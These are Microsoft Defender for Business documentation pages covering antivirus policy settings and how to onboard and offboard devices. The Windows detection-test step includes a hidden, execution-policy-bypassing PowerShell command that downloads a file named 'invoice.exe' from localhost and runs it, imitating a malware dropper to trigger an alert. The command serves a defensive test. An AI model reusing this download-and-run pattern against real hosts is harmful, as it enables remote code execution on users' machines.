- | Edit your default policy | 1. In the **Next-generation protection** section, select your default policy, and then choose **Edit**.<br/><br/>2. On the **General information** step, review the information. If necessary, edit the description, and then select **Next**.<br/><br/>3. On the **Device groups** step, either use an existing group, or set up a new group. Then choose **Next**.<br/><br/>4. On the **Configuration settings** step, review and if necessary, edit your security settings, and then choose **Next**. For more information about the settings, see [Next-generation protection settings and options](#next-generation-protection-settings-and-options) (in this article).<br/><br/>5. On the **Review your policy** step, review your current settings. Select **Edit** to make any needed changes. Then select **Update policy**. |
- | Create a new policy | 1. In the **Next-generation protection** section, select **Add**.<br/><br/>2. On the **General information** step, specify a name and description for your policy. You can also keep or change a policy order (see [Understand policy order in Microsoft Defender for Business](mdb-policy-order.md)). Then select **Next**.<br/><br/>3. On the **Device groups** step, you can either use an existing group, or create up a new group (see [Device groups in Microsoft Defender for Business](mdb-create-edit-device-groups.md)). Then choose **Next**.<br/><br/>4. On the **Configuration settings** step, review and edit your security settings, and then choose **Next**. For more information about the settings, see [Next-generation protection settings and options](#next-generation-protection-settings-and-options) (in this article).<br/><br/>5. On the **Review your policy** step, review your current settings. Select **Edit** to make any needed changes. Then select **Create policy**. |
--
-## [**Intune admin center**](#tab/Intune)
-
-1. Go to the Microsoft Intune admin center ([https://intune.microsoft.com](https://intune.microsoft.com)) and sign in.
-
-2. Select **Endpoint security**.
-
-3. Select **Antivirus** to view your policies in that category.
-
-4. Select an individual policy to edit it.
-
- For help with managing your security settings in Intune, start with [Manage endpoint security in Microsoft Intune](/mem/intune/protect/endpoint-security).
---
-## Next-generation protection settings and options
-
-The following table lists settings and options for next-generation protection in Defender for Business.
-
-| Setting | Description |
-|:|:|
-| **Real-time protection** | |
-| **Turn on real-time protection** | Enabled by default, real-time protection locates and stops malware from running on devices. *We recommend keeping real-time protection turned on.* When real-time protection is turned on, it configures the following settings: <br/>- Behavior monitoring is turned on ([AllowBehaviorMonitoring](/windows/client-management/mdm/policy-csp-defender#defender-allowbehaviormonitoring)).<br/> - All downloaded files and attachments are scanned ([AllowIOAVProtection](/windows/client-management/mdm/policy-csp-defender#defender-allowioavprotection)).<br/> - Scripts that are used in Microsoft browsers are scanned ([AllowScriptScanning](/windows/client-management/mdm/policy-csp-defender#defender-allowscriptscanning)). |
-| **Block at first sight** | Enabled by default, block at first sight blocks malware within seconds of detection, increases the time (in seconds) allowed to submit sample files for analysis, and sets your detection level to High. *We recommend keeping block at first sight turned on.*<br/><br/>When block at first sight is turned on, it configures the following settings for Microsoft Defender Antivirus: <br/>- Blocking and scanning of suspicious files is set to the High blocking level ([CloudBlockLevel](/windows/client-management/mdm/policy-csp-defender#defender-cloudblocklevel)).<br/> - The number of seconds for a file to be blocked and checked is set to 50 seconds ([CloudExtendedTimeout](/windows/client-management/mdm/policy-csp-defender#defender-cloudextendedtimeout)). <br/>**Important** If block at first sight is turned off, it affects `CloudBlockLevel` and `CloudExtendedTimeout` for Microsoft Defender Antivirus. |
-| **Turn on network protection** | Enabled in Block mode by default, network protection helps protect against phishing scams, exploit-hosting sites, and malicious content on the internet. It also prevents users from turning network protection off.<br/><br/>Network protection can be set to the following modes: <br/>- **Block mode** is the default setting. It prevents users from visiting sites that are considered unsafe. *We recommend keeping network protection set to Block mode.*<br/> - **Audit mode** allows users to visit sites that might be unsafe and tracks network activity to/from such sites.<br/> - **Disabled mode** neither blocks users from visiting sites that might be unsafe nor tracks network activity to/from such sites. |
-| **Remediation** | |
-| **Action to take on potentially unwanted apps (PUA)** | Enabled by default, PUA protection blocks items that are detected as PUA. PUA can include advertising software; bundling software that offers to install other, unsigned software; and evasion software that attempts to evade security features. Although PUA isn't necessarily a virus, malware, or other type of threat, it can affect device performance. You can set PUA protection to the following modes: <br/>- **Enabled** is the default setting. It blocks items detected as PUA on devices. *We recommend keeping PUA protection enabled.*<br/> - **Audit mode** takes no action on items detected as PUA.<br/> - **Disabled** doesn't detect or take action on items that might be PUA. |
-| **Scan** | |
-| **Scheduled scan type** | Enabled in Quickscan mode by default, you can specify a day and time to run weekly antivirus scans. The following scan type options are available: <br/>- **Quickscan** checks locations, such as registry keys and startup folders, where malware could be registered to start along with a device. *We recommend using the quickscan option.* <br/> - **Fullscan** checks all files and folders on a device.<br/> - **Disabled** means no scheduled scans will take place. Users can still run scans on their own devices. (In general, we don't recommend disabling scheduled scans.) <br/> [Learn more about scan types](../defender-endpoint/schedule-antivirus-scans.md). |
-| **Day of week to run a scheduled scan** | Select a day for your regular, weekly antivirus scans to run. |
-| **Time of day to run a scheduled scan** | Select a time to run your regularly scheduled antivirus scans to run. |
-| **Use low performance** | This setting is turned off by default. *We recommend keeping this setting turned off.* However, you can turn on this setting to limit the device memory and resources that are used during scheduled scans. **Important** If you turn on **Use low performance**, it configures the following settings for Microsoft Defender Antivirus: <br/>- Archive files aren't scanned ([AllowArchiveScanning](/windows/client-management/mdm/policy-csp-defender#defender-allowarchivescanning)).<br/> - Scans are assigned a low CPU priority ([EnableLowCPUPriority](/windows/client-management/mdm/policy-csp-defender#defender-enablelowcpupriority)).<br/> - If a full antivirus scan is missed, no catch-up scan will run ([DisableCatchupFullScan](/windows/client-management/mdm/policy-csp-defender#defender-disablecatchupfullscan)).<br/> - If a quick antivirus scan is missed, no catch-up scan will run ([DisableCatchupQuickScan](/windows/client-management/mdm/policy-csp-defender#defender-disablecatchupquickscan)).<br/> - Reduces the average CPU load factor during an antivirus scan from 50 percent to 20 percent ([AvgCPULoadFactor](/windows/client-management/mdm/policy-csp-defender#defender-avgcpuloadfactor)). |
-| **User experience** | |
-| **Allow users to access the Windows Security app** | Turn on this setting to enable users to open the Windows Security app on their devices. Users won't be able to override settings that you configure in Defender for Business, but they'll be able to run a quick scan or view any detected threats. |
-| **Antivirus exclusions** | Exclusions are processes, files, or folders that are skipped by Microsoft Defender Antivirus scans. *In general, you shouldn't need to define exclusions.* Microsoft Defender Antivirus includes many automatic exclusions that are based on known operating system behavior and typical management files. Every exclusion reduces your level of protection, so it's important to consider carefully what exclusions to define. Before you add any exclusions, see [Manage exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](../defender-endpoint/defender-endpoint-antivirus-exclusions.md). |
-| **Process exclusions** | Process exclusions prevent files that are opened by specific processes from being scanned by Microsoft Defender Antivirus. When you add a process to the process exclusion list, Microsoft Defender Antivirus won't scan files that are opened by that process, no matter where the files are located. The process itself is scanned unless it is added to the file exclusion list. See [Configure exclusions for files opened by processes](../defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus.md). |
-| **File extension exclusions** | File extension exclusions prevent files with specific extensions from being scanned by Microsoft Defender Antivirus. See [Configure and validate exclusions based on file extension and folder location](../defender-endpoint/configure-extension-file-exclusions-microsoft-defender-antivirus.md). |
-| **File and folder exclusions** | File and folder exclusions prevent files that are in specific folders from being scanned by Microsoft Defender Antivirus. See [Contextual file and folder exclusions](../defender-endpoint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus.md). |
-
-## Other preconfigured settings in Defender for Business
-
-The following security settings are preconfigured in Defender for Business:
--- Scanning of removable drives is turned on ([AllowFullScanRemovableDriveScanning](/windows/client-management/mdm/policy-csp-defender#defender-allowfullscanremovabledrivescanning)).-- Daily quick scans don't have a preset time ([ScheduleQuickScanTime](/windows/client-management/mdm/policy-csp-defender#defender-schedulequickscantime)).-- Security intelligence updates are checked before an antivirus scan runs ([CheckForSignaturesBeforeRunningScan](/windows/client-management/mdm/policy-csp-defender#defender-checkforsignaturesbeforerunningscan)).-- Security intelligence checks occur every four hours ([SignatureUpdateInterval](/windows/client-management/mdm/policy-csp-defender#defender-signatureupdateinterval)).-
-## How default settings in Defender for Business correspond to settings in Microsoft Intune
-
-The following table describes settings that are preconfigured for Defender for Business and how those settings correspond to what you might see in Intune. If you're using the [simplified configuration process in Defender for Business](mdb-setup-configuration.md), you don't need to edit these settings.
-
-| Setting | Description |
-|||
-| [Cloud protection](/windows/client-management/mdm/policy-csp-defender#defender-allowcloudprotection) | Sometimes referred to as cloud-delivered protection or Microsoft Advanced Protection Service (MAPS), cloud protection works with Microsoft Defender Antivirus and the Microsoft cloud to identify new threats, sometimes even before a single device is affected. By default, [AllowCloudProtection](/windows/client-management/mdm/policy-csp-defender#defender-allowcloudprotection) is turned on. [Learn more about cloud protection](../defender-endpoint/cloud-protection-microsoft-defender-antivirus.md). |
-| [Monitoring for incoming and outgoing files](/windows/client-management/mdm/policy-csp-defender#defender-realtimescandirection) | To monitor incoming and outgoing files, [RealTimeScanDirection](/windows/client-management/mdm/policy-csp-defender#defender-realtimescandirection) is set to monitor all files. |
-| [Scan network files](/windows/client-management/mdm/policy-csp-defender#defender-allowscanningnetworkfiles) | By default, [AllowScanningNetworkFiles](/windows/client-management/mdm/policy-csp-defender#defender-allowscanningnetworkfiles) isn't enabled, and network files aren't scanned. |
-| [Scan email messages](/windows/client-management/mdm/policy-csp-defender#defender-allowemailscanning) | By default, [AllowEmailScanning](/windows/client-management/mdm/policy-csp-defender#defender-allowemailscanning) isn't enabled, and email messages aren't scanned. |
-| [Number of days (0-90) to keep quarantined malware](/windows/client-management/mdm/policy-csp-defender#defender-daystoretaincleanedmalware) | By default, the [DaysToRetainCleanedMalware](/windows/client-management/mdm/policy-csp-defender#defender-daystoretaincleanedmalware) setting is set to zero (0) days. Artifacts that are in quarantine aren't removed automatically. |
-| [Submit samples consent](/windows/client-management/mdm/policy-csp-defender#defender-submitsamplesconsent) | By default, [SubmitSamplesConsent](/windows/client-management/mdm/policy-csp-defender#defender-submitsamplesconsent) is set to send safe samples automatically. Examples of safe samples include `.bat`, `.scr`, `.dll`, and `.exe` files that don't contain personally identifiable information (PII). If a file does contain PII, the user receives a request to allow the sample submission to proceed. [Learn more about cloud protection and sample submission](../defender-endpoint/cloud-protection-microsoft-antivirus-sample-submission.md). |
-| [Scan removable drives](/windows/client-management/mdm/policy-csp-defender#defender-allowfullscanremovabledrivescanning) | By default, [AllowFullScanRemovableDriveScanning](/windows/client-management/mdm/policy-csp-defender#defender-allowfullscanremovabledrivescanning) is configured to scan removable drives, such as USB thumb drives on devices. [Learn more about antimalware policy settings](/mem/configmgr/protect/deploy-use/endpoint-antimalware-policies#list-of-antimalware-policy-settings). |
-| [Run daily quick scan time](/windows/client-management/mdm/policy-csp-defender#defender-schedulequickscantime) | By default, [ScheduleQuickScanTime](/windows/client-management/mdm/policy-csp-defender#defender-schedulequickscantime) is set to 2:00 AM. [Learn more about scan settings](/mem/configmgr/protect/deploy-use/endpoint-antimalware-policies#scan-settings). |
-| [Check for signature updates before running scan](/windows/client-management/mdm/policy-csp-defender#defender-checkforsignaturesbeforerunningscan) | By default, [CheckForSignaturesBeforeRunningScan](/windows/client-management/mdm/policy-csp-defender#defender-checkforsignaturesbeforerunningscan) is configured to check for security intelligence updates prior to running antivirus/antimalware scans. [Learn more about scan settings](/mem/configmgr/protect/deploy-use/endpoint-antimalware-policies#scan-settings) and [Security intelligence updates](../defender-endpoint/microsoft-defender-antivirus-updates.md#security-intelligence-updates). |
-| [How often (0-24 hours) to check for security intelligence updates](/windows/client-management/mdm/policy-csp-defender#defender-signatureupdateinterval) | By default, [SignatureUpdateInterval](/windows/client-management/mdm/policy-csp-defender#defender-signatureupdateinterval) is configured to check for security intelligence updates every four hours. [Learn more about scan settings](/mem/configmgr/protect/deploy-use/endpoint-antimalware-policies#scan-settings) and [Security intelligence updates](../defender-endpoint/microsoft-defender-antivirus-updates.md#security-intelligence-updates). |
-
-## Next steps
--- [Set up your firewall policies](mdb-firewall.md) and [custom rules for firewall policies](mdb-firewall.md).-- [Set up your web content filtering policy](mdb-web-content-filtering.md) and enable web protection automatically.-- [Set up your controlled folder access policy](mdb-controlled-folder-access.md) for ransomware protection.-- [Enable your attack surface reduction rules](mdb-asr.md).-- [Review settings for advanced features and the Microsoft Defender portal](mdb-portal-advanced-feature-settings.md).-- [Use your vulnerability management dashboard in Microsoft Defender for Business](mdb-view-tvm-dashboard.md)-
security Mdb Offboard Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-offboard-devices.md
- Title: Offboard a device from Microsoft Defender for Business
-description: Learn about how to remove or offboard a device from Microsoft Defender for Business.
----- Previously updated : 01/26/2023---- SMB-- m365-security-- m365-initiative-defender-business-- tier1--
-# Offboard a device from Microsoft Defender for Business
-
-As devices are replaced or retired, or your business needs change, you can offboard devices from Defender for Business. Offboarding a device causes the device to stop sending data to Defender for Business. However, data received prior to offboarding is retained for up to six (6) months.
-
-> [!IMPORTANT]
-> The procedures in this article describe how to remove a device from monitoring by Defender for Business. If you're using Microsoft Intune to manage devices, and you prefer to remove the device from Intune, see [Remove devices by using wipe, retire, or manually unenrolling the device](/mem/intune/remote-actions/devices-wipe).
-
-## What to do
-
-1. Select a tab:
-
- - **Windows 10 or 11**
- - **Mac**
- - **Servers** (Windows Server or Linux Server)
- - **Mobile** (for iOS/iPadOS or Android devices)
-
-2. Follow the guidance on the selected tab.
-3. Proceed to your next steps.
-
-## [**Windows 10 or 11**](#tab/Windows1011)
-
-## Windows 10 or 11
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. In the navigation pane, choose **Settings**, and then choose **Endpoints**.
-
-3. Under **Device management**, choose **Offboarding**.
-
-4. Select an operating system, such as **Windows 10 and 11**, and then, under **Offboard a device**, in the **Deployment method** section, choose **Local script**.
-
-5. In the confirmation screen, review the information, and then choose **Download** to proceed.
-
-6. Select **Download offboarding package**. We recommend saving the offboarding package to a removable drive.
-
-7. Run the script on each device that you want to offboard.
-
-## [**Mac**](#tab/mac)
-
-## Mac
-
-1. Go to **Finder** > **Applications**.
-
-2. Right click on **Microsoft Defender for Business**, and then choose **Move to Trash**. <br/> or <br/> Use the following command: `sudo '/Library/Application Support/Microsoft/Defender/uninstall/uninstall'`.
-
-## [**Servers**](#tab/Servers)
-
-## Servers
-
-Choose the operating system for your server:
--- [Windows Server](#windows-server)-- [Linux Server](#linux-server)-
-### Windows Server
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), and sign in.
-
-2. In the navigation pane, choose **Settings** > **Endpoints**, and then under **Device management**, choose **Offboarding**.
-
-3. Select an operating system, such as **Windows Server 1803, 2019, and 2022**, and then in the **Deployment method** section, choose **Local script**.
-
-4. Select **Download package**. We recommend that you save the offboarding package to a removable drive. The zipped folder will be called `WindowsDefenderATPOffboardingPackage_valid_until_YYYY-MM-DD.zip` (where `YYYY-MM-DD` is the expiry date of the package).
-
-5. On your Windows Server device, extract the contents of the zipped folder to a location such as the Desktop folder.
-
-6. Open a command prompt as an administrator.
-
-7. Type the location of the script file. For example, if you copied the file to the Desktop folder, you would type `%userprofile%\Desktop\WindowsDefenderATPOffboardingScript_valid_until_2022-11-11.cmd` (where `YYYY-MM-DD` is the expiry date of the package), and then press Enter (or select **OK**).
-
-### Linux Server
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), and sign in.
-
-2. In the navigation pane, choose **Settings** > **Endpoints**, and then under **Device management**, choose **Offboarding**.
-
-3. Select **Linux Server** for the operating system, and then in the **Deployment method** section, choose **Local script**.
-
-4. Select **Download package**. We recommend that you save the offboarding package to a removable drive. The zipped folder will be called `WindowsDefenderATPOffboardingPackage_valid_until_YYYY-MM-DD.zip` (where `YYYY-MM-DD` is the expiry date of the package).
-
-5. On your Linux Server device, extract the contents of the zipped folder to a location such as the Desktop folder.
-
-6. Open a terminal, and navigate to the directory where the `MicrosoftDefenderATPOffboardingLinuxServer_valid_until_YYYY-MM-DD` file (where `YYYY-MM-DD` is the expiry date of the file) is located.
-
-7. Type `python MicrosoftDefenderATPOffboardingLinuxServer_valid_until_YYYY-MM-DD.py` in the terminal.
-
-> [!TIP]
-> For more information, see [Uninstall](../defender-endpoint/linux-resources.md) in the Microsoft Defender for Endpoint on Linux guidance.
-
-## [**Mobile devices**](#tab/mobiles)
-
-## Mobile devices
-
-You can use Microsoft Intune to manage mobile devices, such as iOS, iPadOS, and Android devices.
-
-See [Microsoft Intune device management](/mem/intune/remote-actions/device-management).
---
-## Next steps
--- [Use your Microsoft Defender Vulnerability Management dashboard in Microsoft Defender for Business](mdb-view-tvm-dashboard.md)-- [View or edit policies in Microsoft Defender for Business](mdb-view-edit-create-policies.md)-- [Manage devices in Microsoft Defender for Business](mdb-manage-devices.md)-
security Mdb Onboard Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-business/mdb-onboard-devices.md
- Title: Onboard devices to Microsoft Defender for Business
-description: See how to get devices onboarded to Defender for Business to protect your devices from day one.
----- Previously updated : 08/08/2023----
-# Onboard devices to Microsoft Defender for Business
-
-This article describes how to onboard devices to Defender for Business.
--
-Onboard your business devices to protect them right away. You can choose from several options to onboard your company's devices. This article walks you through your options and describes how onboarding works.
-
-## What to do
-
-1. Select a tab:
- - **Windows 10 and 11**
- - **Mac**
- - **Mobile** (new capabilities are available for iOS and Android devices!)
- - **Servers** (Windows Server or Linux Server)
-2. View your onboarding options, and follow the guidance on the selected tab.
-3. [View a list of onboarded devices](#view-a-list-of-onboarded-devices).
-4. [Run a phishing test on a device](#run-a-phishing-test-on-a-device).
-5. Proceed to your [next steps](#next-steps).
-
-## [**Windows 10 and 11**](#tab/Windows10and11)
-
-## Windows 10 and 11
-
-> [!NOTE]
-> Windows devices must be running one of the following operating systems:
-> - Windows 10 or 11 Business
-> - Windows 10 or 11 Professional
-> - Windows 10 or 11 Enterprise
->
-> For more information, see [Microsoft Defender for Business requirements](mdb-requirements.md).
->
-
-Choose one of the following options to onboard Windows client devices to Defender for Business:
--- [Local script](#local-script-for-windows-10-and-11) (for onboarding devices manually in the Microsoft Defender portal)-- [Group Policy](#group-policy-for-windows-10-and-11) (if you're already using Group Policy in your organization)-- [Microsoft Intune](#intune-for-windows-10-and-11) (if you're already using Intune)-
-### Local script for Windows 10 and 11
-
-You can use a local script to onboard Windows client devices. When you run the onboarding script on a device, it creates a trust with Microsoft Entra ID (if that trust doesn't already exist), enrolls the device in Microsoft Intune (if it isn't already enrolled), and then onboards the device to Defender for Business. If you're not currently using Intune, the local script method is the recommended onboarding method for Defender for Business customers.
-
-> [!TIP]
-> We recommend that you onboard up to 10 devices at a time when you use the local script method.
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), and sign in.
-
-2. In the navigation pane, choose **Settings** > **Endpoints**, and then under **Device management**, choose **Onboarding**.
-
-3. Select **Windows 10 and 11**, and then, in the **Deployment method** section, choose **Local script**.
-
-4. Select **Download onboarding package**. We recommend that you save the onboarding package to a removable drive.
-
-5. On a Windows device, extract the contents of the configuration package to a location, such as the Desktop folder. You should have a file named `WindowsDefenderATPLocalOnboardingScript.cmd`.
-
-6. Open a command prompt as an administrator.
-
-7. Type the location of the script file. For example, if you copied the file to the Desktop folder, you would type `%userprofile%\Desktop\WindowsDefenderATPLocalOnboardingScript.cmd`, and then press the Enter key (or select **OK**).
-
-8. After the script runs, [Run a detection test](#run-a-detection-test-on-a-windows-10-or-11-device).
-
-### Group Policy for Windows 10 and 11
-
-If you prefer to use Group Policy to onboard Windows clients, follow the guidance in [Onboard Windows devices using Group Policy](../defender-endpoint/configure-endpoints-gp.md). This article describes the steps for onboarding to Microsoft Defender for Endpoint. The steps for onboarding to Defender for Business are similar.
-
-### Intune for Windows 10 and 11
-
-You can onboard Windows clients and other devices in Intune by using the Intune admin center ([https://intune.microsoft.com](https://intune.microsoft.com)). There are several methods available for enrolling devices in Intune. We recommend using one of the following methods:
--- [Enable Windows automatic enrollment for company-owned or company-managed devices](#enable-automatic-enrollment-for-windows-10-and-11)-- [Ask users to enroll their own Windows 10/11 devices in Intune](#ask-users-to-enroll-their-windows-10-and-11-devices)-
-#### Enable automatic enrollment for Windows 10 and 11
-
-When you set up automatic enrollment, users add their work account to the device. In the background, the device registers and joins Microsoft Entra ID and is enrolled in Intune.
-
-1. Go to the Azure portal ([https://portal.azure.com/](https://portal.azure.com/)) and sign in.
-
-2. Select **Microsoft Entra ID** > **Mobility (MDM and MAM)** > **Microsoft Intune**.
-
-3. Configure the **MDM User scope** and the **MAM user scope**.
-
- :::image type="content" source="mediM user scope and MAM user scope in Intune.":::
-
- - For MDM User scope, we recommend that you select **All** so that all users can automatically enroll their Windows devices.
- - In the MAM user scope section, we recommend the following default values for the URLs:
-
- - **MDM Terms of use URL**
- - **MDM Discovery URL**
- - **MDM Compliance URL**
-
-4. Select **Save**.
-
-5. After a device is enrolled in Intune, you can add it to a device group in Defender for Business. [Learn more about device groups in Defender for Business](mdb-create-edit-device-groups.md).
-
-> [!TIP]
-> To learn more, see [Enable Windows automatic enrollment](/mem/intune/enrollment/windows-enroll).
-
-#### Ask users to enroll their Windows 10 and 11 devices
-
-1. Watch the following video to see how enrollment works:<br/><br/>
-
- > [!VIDEO https://www.youtube.com/embed/TKQxEckBHiE?rel=0]
-
-2. Share this article with users in your organization: [Enroll Windows 10/11 devices in Intune](/mem/intune/user-help/enroll-windows-10-device).
-
-3. After a device is enrolled in Intune, you can add it to a device group in Defender for Business. [Learn more about device groups in Defender for Business](mdb-create-edit-device-groups.md).
-
-### Run a detection test on a Windows 10 or 11 device
-
-After you've onboarded Windows devices to Defender for Business, you can run a detection test on the device to make sure that everything is working correctly.
-
-1. On the Windows device, create a folder: `C:\test-MDATP-test`.
-
-2. Open Command Prompt as an administrator.
-
-3. In the Command Prompt window, run the following PowerShell command:
-
- ```powershell
- powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
- ```
-
-After the command runs, the Command Prompt window closes automatically. If successful, the detection test is marked as completed, and a new alert appears in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) for the newly onboarded device within about 10 minutes.
-
-## [**Mac**](#tab/mac)
-
-## Mac
-
-> [!NOTE]
-> We recommend that you use a [local script to onboard Mac](#local-script-for-mac). Although you can [set up enrollment for Mac using Intune](/mem/intune/enrollment/macos-enroll), the local script is the simplest method for onboarding Mac to Defender for Business.
-
-Choose one of the following options to onboard Mac:
--- [Local script for Mac](#local-script-for-mac) (*recommended*)-- [Intune for Mac](#intune-for-mac) (if you're already using Intune)-
-### Local script for Mac
-
-When you run the local script on Mac, it creates a trust with Microsoft Entra ID (if that trust doesn't already exist), enrolls the Mac in Microsoft Intune (if it isn't already enrolled), and then onboards the Mac to Defender for Business. We recommend that you onboard up to 10 devices at a time using this method.
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), and sign in.
-
-2. In the navigation pane, choose **Settings** > **Endpoints**, and then under **Device management**, choose **Onboarding**.
-
-3. Select **macOS**. In the **Deployment method** section, choose **Local script**.
-
-4. Select **Download onboarding package**, and save it to a removable drive. Also select **Download installation package**, and save it to your removable device.
-
-5. On Mac, save the installation package as `wdav.pkg` to a local directory.
-
-6. Save the onboarding package as `WindowsDefenderATPOnboardingPackage.zip` to the same directory you used for the installation package.
-
-7. Use Finder to navigate to `wdav.pkg` you saved, and then open it.
-
-8. Select **Continue**, agree with the license terms, and then enter your password when prompted.
-
-9. You're prompted to allow installation of a driver from Microsoft (either *System Extension Blocked* or *Installation is on hold*, or both). You must allow the driver installation. Select **Open Security Preferences** or **Open System Preferences** > **Security & Privacy**, and then select **Allow**.
-
-10. Use the following Bash command to run the onboarding package:
-
- ```bash
- /usr/bin/unzip WindowsDefenderATPOnboardingPackage.zip \
- && /bin/chmod +x MicrosoftDefenderATPOnboardingMacOs.sh \
- && /bin/bash -c MicrosoftDefenderATPOnboardingMacOs.sh
- ```
-
-After Mac is enrolled in Intune, you can add it to a device group. [Learn more about device groups in Defender for Business](mdb-create-edit-device-groups.md).
-
-### Intune for Mac
-
-If you already have Intune, you can enroll Mac computers by using the Intune admin center ([https://intune.microsoft.com](https://intune.microsoft.com)). There are several methods available for enrolling Mac in Intune. We recommend one of the following methods:
--- [Choose an option for company-owned Mac](#options-for-company-owned-mac)-- [Ask users to enroll their own Mac in Intune](#ask-users-to-enroll-their-own-mac-in-intune)-
-#### Options for company-owned Mac
-
-Choose one of the following options to enroll company-managed Mac devices in Intune:
-
-| Option | Description |
-|||
-| Apple Automated Device Enrollment | Use this method to automate enrollment on devices purchased through Apple Business Manager or Apple School Manager. Automated device enrollment deploys the enrollment profile "over the air," so you don't need to have physical access to devices. <br/><br/>See [Automatically enroll Mac with the Apple Business Manager or Apple School Manager](/mem/intune/enrollment/device-enrollment-program-enroll-macos). |
-| Device enrollment manager (DEM) | Use this method for large-scale deployments and when there are multiple people in your organization who can help with enrollment setup. Someone with device enrollment manager (DEM) permissions can enroll up to 1,000 devices with a single Microsoft Entra account. This method uses the Company Portal app or Microsoft Intune app to enroll devices. You can't use a DEM account to enroll devices via Automated Device Enrollment.<br/><br/> See [Enroll devices in Intune by using a device enrollment manager account](/mem/intune/enrollment/device-enrollment-manager-enroll). |
-| Direct enrollment | Direct enrollment enrolls devices with no user affinity, so this method is best for devices that aren't associated with a single user. This method requires you to have physical access to the Macs you're enrolling. <br/><br/>See [Use Direct Enrollment for Mac](/mem/intune/enrollment/device-enrollment-direct-enroll-macos). |
-
-#### Ask users to enroll their own Mac in Intune
-
-If your business prefers to have people enroll their own devices in Intune, direct users to follow these steps:
-
-1. Go to the Company Portal website ([https://portal.manage.microsoft.com/](https://portal.manage.microsoft.com/)) and sign in.
-
-2. Follow the instructions on the Company Portal website to add their device.
-
-3. Install the Company Portal app at [https://aka.ms/EnrollMyMac](https://aka.ms/EnrollMyMac), and follow the instructions in the app.
-
-### Confirm that a Mac is onboarded
-
-1. To confirm that the device is associated with your company, use the following Python command in Bash:
-
- `mdatp health --field org_id`.
-
-2. If you're using macOS 10.15 (Catalina) or later, grant Defender for Business consent to protect your device. Go to **System Preferences** > **Security & Privacy** > **Privacy** > **Full Disk Access**. Select the lock icon at the bottom of the dialog to make changes, and then select **Microsoft Defender for Business** (or **Defender for Endpoint**, if that's what you see).
-
-3. To verify that the device is onboarded, use the following command in Bash:
-
- `mdatp health --field real_time_protection_enabled`
-
-After a device is enrolled in Intune, you can add it to a device group. [Learn more about device groups in Defender for Business](mdb-create-edit-device-groups.md).
-
-## [**Mobile devices**](#tab/mobiles)
-
-## Mobile devices
-
-You can use the following methods to onboard mobile devices, such as Android and iOS devices:
--- [Use the Microsoft Defender app](#use-the-microsoft-defender-app)-- [Use Microsoft Intune](#use-microsoft-intune)-
-### Use the Microsoft Defender app
-
-[Mobile threat defense capabilities](mdb-mtd.md) are now generally available to Defender for Business customers. With these capabilities, you can now onboard mobile devices (such as Android and iOS) by using the Microsoft Defender app. With this method, users download the app from Google Play or the Apple App Store, sign in, and complete onboarding steps.
-
-> [!IMPORTANT]
-> Make sure that all of the following requirements are met before onboarding mobile devices:
-> 1. Defender for Business has finished provisioning. In the [Microsoft Defender portal](https://security.microsoft.com), go to **Assets** > **Devices**.<br/>- If you see a message that says, "Hang on! We're preparing new spaces for your data and connecting them," then Defender for Business hasn't finished provisioning. This process is happening now, and it can take up to 24 hours to complete. <br/>- If you see a list of devices, or you're prompted to onboard devices, it means Defender for Business provisioning has completed.
-> 2. Users have downloaded the Microsoft Authenticator app on their device, and have registered their device using their work or school account for Microsoft 365.
-
-| Device | Procedure |
-|:|:|
-| Android | 1. On the device, go to the Google Play store.<br/><br/>2. If you haven't already done so, download and install the Microsoft Authenticator app. Sign in, and register your device in the Microsoft Authenticator app. <br/><br/>3. In the Google Play store, search for the Microsoft Defender app, and install it. <br/><br/>4. Open the Microsoft Defender app, sign in, and complete the onboarding process. |
-| iOS | 1. On the device, go to the Apple App Store. <br/><br/>2. If you haven't already done so, download and install the Microsoft Authenticator app. Sign in, and register your device in the Microsoft Authenticator app.<br/><br/>3. In the Apple App Store, search for the Microsoft Defender app.<br/><br/>4. Sign in and install the app. <br/><br/>5. Agree to the terms of use to continue. <br/><br/>6. Allow the Microsoft Defender app to set up a VPN connection and add VPN configurations. <br/><br/>7. Choose whether to allow notifications (such as alerts). |
-
-> [!TIP]
-> After you have onboarded mobile devices using the Microsoft Defender app, proceed to [run a phishing test on a device](#run-a-phishing-test-on-a-device).
-
-### Use Microsoft Intune
-
-If your subscription includes Microsoft Intune, you can use it to onboard mobile devices, such as Android and iOS/iPadOS devices. See the following resources to get help enrolling these devices into Intune:
--- [Enroll Android devices](/mem/intune/enrollment/android-enroll)-- [Enroll iOS or iPadOS devices](/mem/intune/enrollment/ios-enroll)-
-After a device is enrolled in Intune, you can add it to a device group. [Learn more about device groups in Defender for Business](mdb-create-edit-device-groups.md).
---
-## [**Servers**](#tab/Servers)
-
-## Servers
-
-> [!NOTE]
-> If you're planning to onboard an instance of Windows Server or Linux Server, you'll need an additional license, such as [Microsoft Defender for Business servers](get-defender-business.md#how-to-get-microsoft-defender-for-business-servers). Alternately, you could use [Microsoft Defender for Servers Plan 1 or Plan 2](/azure/defender-for-cloud/plan-defender-for-servers). To learn more, see [What happens if I have a mix of Microsoft endpoint security subscriptions](mdb-faq.yml#what-happens-if-i-have-a-mix-of-microsoft-endpoint-security-subscriptions)?
-
-Choose the operating system for your server:
--- [Windows Server](#windows-server)-- [Linux Server](#linux-server)-
-## Windows Server
-
-> [!IMPORTANT]
-> Make sure that you meet the following requirements before you onboard a Windows Server endpoint:
-> - You have a Microsoft Defender for Business servers license. (See [How to get Microsoft Defender for Business servers](get-defender-business.md#how-to-get-microsoft-defender-for-business-servers).)
